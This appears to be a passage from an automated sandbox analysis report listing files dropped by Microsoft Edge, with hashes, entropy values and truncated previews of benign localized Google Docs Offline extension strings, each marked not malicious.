                                                                                                                                                                                    SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                    SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):954
                                                                                                                                                                                    Entropy (8bit):4.6457079159286545
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                    MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                    SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                    SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                    SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):899
                                                                                                                                                                                    Entropy (8bit):4.474743599345443
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                    MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                    SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                    SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                    SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2230
                                                                                                                                                                                    Entropy (8bit):3.8239097369647634
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                    MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                    SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                    SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                    SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1160
                                                                                                                                                                                    Entropy (8bit):5.292894989863142
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                    MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                    SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                    SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                    SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):3264
                                                                                                                                                                                    Entropy (8bit):3.586016059431306
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                    MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                    SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                    SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                    SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):3235
                                                                                                                                                                                    Entropy (8bit):3.6081439490236464
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                    MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                    SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                    SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                    SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):3122
                                                                                                                                                                                    Entropy (8bit):3.891443295908904
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                    MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                    SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                    SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                    SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1895
                                                                                                                                                                                    Entropy (8bit):4.28990403715536
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                    MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                    SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                    SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                    SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1042
                                                                                                                                                                                    Entropy (8bit):5.3945675025513955
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                    MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                    SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                    SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                    SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2535
                                                                                                                                                                                    Entropy (8bit):3.8479764584971368
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                    MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                    SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                    SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                    SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1028
                                                                                                                                                                                    Entropy (8bit):4.797571191712988
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                    MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                    SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                    SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                    SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):994
                                                                                                                                                                                    Entropy (8bit):4.700308832360794
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                    MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                    SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                    SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                    SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2091
                                                                                                                                                                                    Entropy (8bit):4.358252286391144
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                    MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                    SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                    SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                    SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2778
                                                                                                                                                                                    Entropy (8bit):3.595196082412897
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                    MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                    SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                    SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                    SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
